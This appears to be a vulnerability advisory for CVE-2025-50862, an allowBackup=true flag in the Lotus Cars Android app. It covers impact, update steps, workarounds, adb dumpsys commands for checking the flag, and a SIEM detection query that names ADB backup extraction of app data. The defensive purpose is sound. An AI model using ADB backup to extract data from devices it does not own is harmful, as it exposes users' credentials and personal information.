CVE-2025-50862
📋 TL;DR
The Lotus Cars Android app (version 1.2.8) has allowBackup=true in its manifest, enabling attackers with physical access to rooted or debug-enabled devices to extract app data via ADB backup commands. This vulnerability exposes potentially sensitive user data stored by the app. Only users of this specific Android app version are affected.
💻 Affected Systems
- Lotus Cars Android app
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete exfiltration of all app data including user credentials, personal information, vehicle data, and any locally stored sensitive information from vulnerable devices.
Likely Case
Exposure of user preferences, cached data, and potentially authentication tokens from rooted or developer-enabled devices.
If Mitigated
No data exposure if devices are not rooted, USB debugging is disabled, and physical access controls are enforced.
🎯 Exploit Status
Requires physical access to device, ADB connectivity, and either rooted device or USB debugging enabled. Not remotely exploitable.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Version >1.2.8 with allowBackup=false in manifest
Vendor Advisory: http://lotus.com
Restart Required: No
Instructions:
1. Update Lotus Cars app to latest version from Google Play Store. 2. Verify update installed successfully. 3. No device restart required.
🔧 Temporary Workarounds
Disable USB Debugging
AndroidPrevents ADB access which is required for exploitation
Settings > Developer Options > USB debugging (toggle OFF)
Disable Developer Options
AndroidCompletely disables developer features including ADB
Settings > Developer Options > Turn OFF (if available) or Settings > System > Developer options > Disable
🧯 If You Can't Patch
- Disable USB debugging on all devices
- Implement physical security controls to prevent unauthorized device access
🔍 How to Verify
Check if Vulnerable:
Check app manifest: adb shell dumpsys package com.lotus.carsdomestic.intl | grep allowBackup. If returns 'allowBackup=true', device is vulnerable.Check Version:
adb shell dumpsys package com.lotus.carsdomestic.intl | grep versionNameVerify Fix Applied:
After update, run same command. Should return 'allowBackup=false' or not return the line at all.📡 Detection & Monitoring
Log Indicators:
- ADB backup commands in device logs
- Unauthorized ADB connections
Network Indicators:
- ADB protocol traffic on USB or network interfaces
SIEM Query:
source="android_device" AND (event="adb_backup" OR process="adb" AND command="backup")